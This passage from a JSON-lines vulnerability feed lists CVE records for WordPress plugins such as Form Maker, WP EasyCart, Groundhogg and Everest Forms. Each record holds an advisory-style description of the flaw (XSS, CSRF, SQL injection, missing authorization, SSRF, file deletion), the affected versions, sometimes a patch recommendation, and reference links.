page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f321e41a-3945-47db-a215-aeb001b7b80b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f321e41a-3945-47db-a215-aeb001b7b80b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/portswigger.net\\\/research\\\/xss-in-hidden-input-fields\",\"name\":\"https:\\\/\\\/portswigger.net\\\/research\\\/xss-in-hidden-input-fields\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stripe-payments\\\/trunk\\\/includes\\\/shortcodes\\\/class-asp-shortcode-ng.php#L715\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stripe-payments\\\/trunk\\\/includes\\\/shortcodes\\\/class-asp-shortcode-ng.php#L715\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stripe-payments\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stripe-payments\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6925","slug":"truebooker-appointment-booking","versionImpact":"1.0.2","description":"The TrueBooker  WordPress plugin before 1.0.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1da75fd7-e44f-4043-b8f4-7ee975356982\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1da75fd7-e44f-4043-b8f4-7ee975356982\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8675","slug":"soumettre-fr","versionImpact":"2.1.2","description":"The Soumettre.fr plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the soumettre_disconnect_gateway function in all versions up to, and including, 2.1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disconnect the gateway and delete the API key.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad05b088-977e-4f24-b843-dc65f1aa60e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad05b088-977e-4f24-b843-dc65f1aa60e9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soumettre-fr\\\/trunk\\\/admin\\\/class-soumettre-admin.php#L276\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soumettre-fr\\\/trunk\\\/admin\\\/class-soumettre-admin.php#L276\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9452","slug":"branding","versionImpact":"1.0","description":"The Branding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8736cf81-3fb8-4c81-a878-7d73a3e68fc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8736cf81-3fb8-4c81-a878-7d73a3e68fc2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/branding\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/branding\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10265","slug":"form-maker","versionImpact":"1.15.30","description":"The Form Maker by 10Web \u2013 Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.15.30. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb1a2c2-581d-47ed-a180-9f70fdf79066?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb1a2c2-581d-47ed-a180-9f70fdf79066?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/form-maker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/form-maker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-maker\\\/trunk\\\/wd\\\/includes\\\/notices.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-maker\\\/trunk\\\/wd\\\/includes\\\/notices.php#L199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183170\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183170\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1314","slug":"custom-twitter-feeds","versionImpact":"2.2.5","description":"The Custom Twitter Feeds \u2013 A Tweets Widget or X Feed Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.5. This is due to missing or incorrect nonce validation on the ctf_clear_cache_admin() function. This makes it possible for unauthenticated attackers to reset the plugin's cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L1014\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L1014\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L810\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L810\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L833\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php#L833\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254840\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254840\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-twitter-feeds\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-twitter-feeds\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28d47605-ecb8-42cc-901a-3cf07b946877?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28d47605-ecb8-42cc-901a-3cf07b946877?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3863","slug":"post-carousel-slider-for-elementor","versionImpact":"1.6.0","description":"The Post Carousel Slider for Elementor plugin for WordPress is vulnerable to improper authorization due to a missing capability check on the process_wbelps_promo_form() function in all versions up to, and including, 1.6.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to trigger the plugin\u2019s support-form handler to send arbitrary emails to the site\u2019s support address.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-carousel-slider-for-elementor\\\/tags\\\/1.5.0\\\/support-page\\\/class-support-page.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-carousel-slider-for-elementor\\\/tags\\\/1.5.0\\\/support-page\\\/class-support-page.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3316424%40post-carousel-slider-for-elementor&new=3316424%40post-carousel-slider-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3316424%40post-carousel-slider-for-elementor&new=3316424%40post-carousel-slider-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-carousel-slider-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-carousel-slider-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b92afdf-51e0-4cf5-9f2b-997b9ff98b23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b92afdf-51e0-4cf5-9f2b-997b9ff98b23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28666","slug":"inpost-gallery","versionImpact":"2.1.4.1","description":"The InPost Gallery WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'imgurl' parameter to the add_inpost_gallery_slide_item action, which can only be triggered by an authenticated user.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2736","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.9.8. This is due to missing nonce validation in the 'ajax_edit_contact' function. This makes it possible for authenticated attackers to receive the auto login link via shortcode and then modify the assigned user to the auto login link to elevate verified user privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bf472f1-5980-48ee-aa10-aad19b6f2456?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bf472f1-5980-48ee-aa10-aad19b6f2456?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/contacts\\\/contacts-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/contacts\\\/contacts-page.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/contacts\\\/contacts-page.php#L542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/contacts\\\/contacts-page.php#L542\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/shortcodes.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/includes\\\/shortcodes.php#L99\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1843","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to unauthorized permalink structure update due to a missing capability check on the permalink_setup function in versions up to, and including, 3.3.0. This makes it possible for unauthenticated attackers to change the permalink structure.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/plugin.php#L544\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/plugin.php#L544\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5db00eb6-3e05-42fa-bb84-2df4bcae3955?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5db00eb6-3e05-42fa-bb84-2df4bcae3955?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3023","slug":"wp-easycart","versionImpact":"5.4.10","description":"The WP EasyCart plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in versions up to, and including, 5.4.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level or above permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923668\\\/wp-easycart\\\/trunk\\\/admin\\\/inc\\\/wp_easycart_admin_table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923668\\\/wp-easycart\\\/trunk\\\/admin\\\/inc\\\/wp_easycart_admin_table.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c1ddaf-4bf2-4937-b7bf-a09162db043e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c1ddaf-4bf2-4937-b7bf-a09162db043e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0432","slug":"wppdf","versionImpact":"20221130","description":"The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_delete_card' function. This makes it possible for unauthenticated attackers to delete the default card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7561a71a-c3f0-45f1-8230-2c17cbeff916?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wppdf\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wppdf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1158","slug":"buddyforms","versionImpact":"2.8.7","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the buddyforms_new_page function in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber access or higher, to create pages with arbitrary titles. These pages are published.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/198cb3bb-73fe-45ae-b8e0-b7ee8dda9547?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/198cb3bb-73fe-45ae-b8e0-b7ee8dda9547?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/admin\\\/admin-ajax.php?rev=2820257#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/trunk\\\/includes\\\/admin\\\/admin-ajax.php?rev=2820257#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3046092%40buddyforms%2Ftrunk&old=3031945%40buddyforms%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3046092%40buddyforms%2Ftrunk&old=3031945%40buddyforms%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2831","slug":"calendar","versionImpact":"1.3.14","description":"The Calendar plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcodes in all versions up to, and including, 1.3.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0886fa16-4292-4223-af01-9aa1f36490f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0886fa16-4292-4223-af01-9aa1f36490f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calendar\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calendar\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4788","slug":"boostify-header-footer-builder","versionImpact":"1.3.3","description":"The Boostify Header Footer Builder for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the create_bhf_post function in all versions up to, and including, 1.3.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to create pages or posts with arbitrary content.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1090acfc-5b0c-478a-ac71-db54fdaefdf5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1090acfc-5b0c-478a-ac71-db54fdaefdf5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/admin\\\/class-admin.php#L280\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/admin\\\/class-admin.php#L280\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6522","slug":"modern-events-calendar-lite","versionImpact":"7.12.1","description":"The Modern Events Calendar plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.12.1 via the 'mec_fes_form' AJAX function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00bf8f2f-6ab4-4430-800b-5b97abe7589e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00bf8f2f-6ab4-4430-800b-5b97abe7589e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modern-events-calendar-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modern-events-calendar-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modern-events-calendar-lite\\\/trunk\\\/app\\\/features\\\/fes.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modern-events-calendar-lite\\\/trunk\\\/app\\\/features\\\/fes.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/mec.webnus.net\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/mec.webnus.net\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6924","slug":"truebooker-appointment-booking","versionImpact":"1.0.2","description":"The TrueBooker  WordPress plugin before 1.0.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39e79801-6ec7-4579-bc6b-fd7e899733a8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39e79801-6ec7-4579-bc6b-fd7e899733a8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8632","slug":"kb-support","versionImpact":"1.6.6","description":"The KB Support \u2013 WordPress Help Desk and Knowledge Base plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the 'kbs_ajax_load_front_end_replies' and 'kbs_ajax_mark_reply_as_read' functions in all versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to read replies of any ticket, and mark any reply as read.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/767b1234-5b4a-4baa-9048-7b2e413cdba5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/767b1234-5b4a-4baa-9048-7b2e413cdba5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L342\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L342\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L439\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L439\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9383","slug":"woo-parcel-pro","versionImpact":"1.8.4","description":"The Parcel Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'action' parameter in all versions up to, and including, 1.8.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e8fe6f4-7e41-44d3-9980-b5e7f43aa849?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e8fe6f4-7e41-44d3-9980-b5e7f43aa849?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-parcel-pro\\\/trunk\\\/admin\\\/class-parcelpro-admin.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-parcel-pro\\\/trunk\\\/admin\\\/class-parcelpro-admin.php#L274\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12574","slug":"svg-shortcode","versionImpact":"1.0.1","description":"The SVG Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-shortcode\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-shortcode\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b378256-2d9b-4aad-abfe-fecfc76f0bb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b378256-2d9b-4aad-abfe-fecfc76f0bb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13522","slug":"magayo-lottery-results","versionImpact":"2.0.12","description":"The magayo Lottery Results plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.12. This is due to missing or incorrect nonce validation on the 'magayo-lottery-results' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magayo-lottery-results\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magayo-lottery-results\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03c5f9c6-3346-43fc-beb3-d0269b5599d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03c5f9c6-3346-43fc-beb3-d0269b5599d1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13881","slug":"linkmyposts","versionImpact":"1.0","description":"The Link My Posts WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/900fa2c6-0cac-4920-aef2-e8b94248b62e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/900fa2c6-0cac-4920-aef2-e8b94248b62e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5927","slug":"everest-forms","versionImpact":"1.9.4","description":"The Everest Forms (Pro) plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_entry_files() function in all versions up to, and including, 1.9.4. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The vulnerability requires an admin to trigger the deletion via deletion of a form entry and cannot be carried out by the attacker alone.","refs":"[{\"url\":\"https:\\\/\\\/everestforms.net\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/everestforms.net\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/everest-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/everest-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e3a118f-4321-4579-a986-05ce077dc6b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e3a118f-4321-4579-a986-05ce077dc6b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
